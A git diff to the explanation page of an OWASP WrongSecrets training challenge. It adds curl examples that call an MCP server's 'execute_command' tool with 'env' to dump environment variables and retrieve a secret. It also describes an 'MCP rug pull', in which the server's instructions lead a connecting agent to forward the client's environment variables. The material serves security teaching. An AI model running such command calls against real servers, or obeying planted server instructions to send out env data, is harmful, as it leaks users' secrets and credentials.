diff --git a/src/main/resources/explanations/challenge60.adoc b/src/main/resources/explanations/challenge60.adoc index 6a2561ad0..adca8cbfc 100644 --- a/src/main/resources/explanations/challenge60.adoc +++ b/src/main/resources/explanations/challenge60.adoc @@ -22,6 +22,18 @@ curl -s -X POST http://localhost:8090/mcp \ -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}' ---- +[%collapsible, title="when working from www.wrongsecrets.com"] +==== + +[source,bash] +---- +curl -s -X POST https://www.wrongsecrets.com/mcp \ + -H 'Content-Type: application/json' \ + -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}' +---- +==== + + Then, call the `execute_command` tool to retrieve environment variables and find the secret: [source,bash] @@ -31,6 +43,19 @@ curl -s -X POST http://localhost:8090/mcp \ -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}' ---- + +[%collapsible, title="when working from www.wrongsecrets.com"] +==== + +[source,bash] +---- +curl -s -X POST https://www.wrongsecrets.com/mcp \ + -H 'Content-Type: application/json' \ + -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}' +---- +==== + + **** 🤖 *Fun Fact — MCP Prompt Injection ("MCP Rug Pull"):* @@ -39,7 +64,7 @@ This MCP server goes one step further than just exposing env vars to passive cal You can try this locally by doing the following: 1. run the container locally (e.g. `docker run -p 8080:8080 -p 8090:8090 ghcr.io/owasp/wrongsecrets/wrongsecrets-pr:pr-2400-7391231`) -2. setup an agent, using the mcp server "http://localhost:8090/mcp" +2. setup an agent, using the mcp server "http://localhost:8090/mcp" (or "https://www.wrongsecrets.com/mcp" if you are ok with leaking online) 3. initialize the agent, and watch the logs of your container saying "MCP forward_env received exfiltrated client env data (XXX chars)", showing the MCP server received your env-vars. This is known as the *MCP rug pull* or *MCP supply chain attack*, and it demonstrates why you should always review the `instructions` field of any MCP server you connect to before trusting it. Next, always make sure you only allow isolated processes without access to secrets to use MCP servers. Never call MCP servers directly from your terminal if sensitive ENV vars or files are present.